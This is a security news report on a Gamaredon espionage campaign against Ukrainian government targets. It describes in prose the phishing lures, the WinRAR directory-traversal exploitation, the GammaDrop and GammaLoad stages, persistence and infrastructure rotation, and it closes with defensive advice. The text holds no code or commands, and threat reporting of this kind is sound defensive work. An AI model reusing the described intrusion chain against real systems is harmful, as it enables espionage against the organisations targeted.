FHN 
A sustained cyber-espionage campaign linked to the Gamaredon threat group is actively targeting Ukrainian government organizations through large-scale phishing attacks and multi-stage malware delivery chains. The operation combines social engineering, abuse of trusted infrastructure, and custom malware loaders to maintain long-term access to compromised systems.
Also tracked as UAC-0010 or Shuckworm, Gamaredon continues to exploit CVE-2025-8088, a directory traversal vulnerability in WinRAR that allows malicious files to be written outside the intended extraction directory. Although the flaw has been widely abused since 2025, researchers noted that Gamaredon’s campaigns stand out due to their persistence, rapid infrastructure rotation, and repeated targeting of Ukrainian government entities.
Phishing Campaign Delivers GammaDrop Malware
The attacks begin with carefully crafted spearphishing emails sent either from compromised Ukrainian government accounts or spoofed domains designed to appear legitimate. Many of these emails mimic official court summons, legal notices, or government-related communications to increase the likelihood of user interaction.
The phishing attachments typically contain malicious RAR or ARJ archives disguised as regular documents. Inside the archive, researchers identified:
- A decoy PDF document used to distract the victim
- A hidden VBScript payload stored using NTFS Alternate Data Streams (ADS)
When the archive is extracted, the WinRAR vulnerability is abused to silently place the malicious VBScript into the Windows Startup folder. This ensures persistence on the infected machine without requiring additional user interaction.
The first-stage payload, known as GammaDrop, functions as a downloader responsible for retrieving additional malware from attacker-controlled infrastructure. Researchers observed that the script is heavily obfuscated using randomized variables, junk code, and automated generation techniques commonly associated with Gamaredon operations.
GammaLoad Expands Persistence and Reconnaissance
After execution, GammaDrop downloads a second-stage malware component called GammaLoad from infrastructure hosted through Cloudflare Workers. The payload is delivered as an HTA file and launched using mshta.exe in a hidden window to avoid drawing attention.
GammaLoad acts as both a persistence mechanism and a reconnaissance tool. It creates RunOnce registry entries and continuously communicates with command-and-control servers to receive instructions and additional payloads.
The malware collects system-level information including:
- Computer name
- System drive details
- Volume serial numbers
- Victim identification data
This information is embedded into beaconing traffic, allowing attackers to uniquely track infected systems and selectively deliver follow-up malware.
Researchers also observed that Gamaredon frequently rotates its infrastructure using fast-flux DNS, dynamic DNS services, and short-lived domains to evade detection. Communication traffic is disguised using legitimate browser user-agent strings, while some newer variants imitate automated services such as Bingbot to blend malicious traffic with normal network activity.
The Security Service of Ukraine (SSU), along with regional government and law enforcement organizations, remains one of the primary targets of these campaigns. Researchers believe the operation’s success is also supported by weak email authentication practices across some targeted domains, where missing or poorly configured SPF, DKIM, and DMARC policies allow attackers to spoof trusted senders more effectively.
Although the malware itself is not considered highly advanced, Gamaredon continues to maintain a strong operational presence through continuous adaptation, large-scale phishing activity, and aggressive infrastructure management.
Security teams are advised to patch vulnerable WinRAR installations immediately, strengthen email authentication controls, monitor suspicious archive-based phishing activity, and block known malicious infrastructure associated with the campaign.
About the Author
